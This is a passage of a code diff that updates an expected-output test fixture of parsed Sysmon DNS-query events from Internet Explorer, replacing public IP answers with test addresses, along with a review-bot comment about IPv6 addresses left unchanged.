Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -818,7 +818,7 @@ "ProcessId": "2736", "QueryName": "sb.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;", + "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.485", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -830,7 +830,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -855,7 +855,7 @@ "version": 5, "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;", + "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.500", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -949,7 +949,7 @@ { "@timestamp": "2021-05-05T15:30:51.695Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -970,7 +970,7 @@
 "ProcessId": "2736",
 "QueryName": "ping.chartbeat.net",
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -1004,7 +1004,7 @@
 "identifier": "S-1-5-18"
 },
 "event_data": {
- "QueryResults": "::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.628",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -1018,7 +1018,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1041,7 +1041,7 @@
 "event_data": {
 "QueryName": "nym1-ib.adnxs.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.633",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
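Review bot: The IPv6 answers in the new QueryResults value on this hunk's `+` line (`2001:503:a83e::2:30`, `2001:503:231d::2:30`) are left as public addresses while every IPv4 answer on the same line is rewritten, which looks inconsistent with the commit's stated aim of moving test public IPs to the supported subset; if the allowed-IP check only covers IPv4 this is fine, but it is worth confirming rather than leaving half of one DNS answer list sanitized. The same pattern appears in the hunks at -1060, -1107, -1127, -1193, -1212 and -1236. Since this is an expected-output fixture, the matching input log presumably carries the identical substitutions elsewhere in the diff; that file is outside this chunk, so it could not be checked here.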
@@ -1060,7 +1060,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1069,7 +1069,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "computer_name": "vagrant-2016", 
@@ -1082,7 +1082,7 @@
 "ProcessId": "2736",
 "QueryName": "eb2.3lift.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;",
+ "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.716",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -1107,7 +1107,7 @@ "event": { "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData 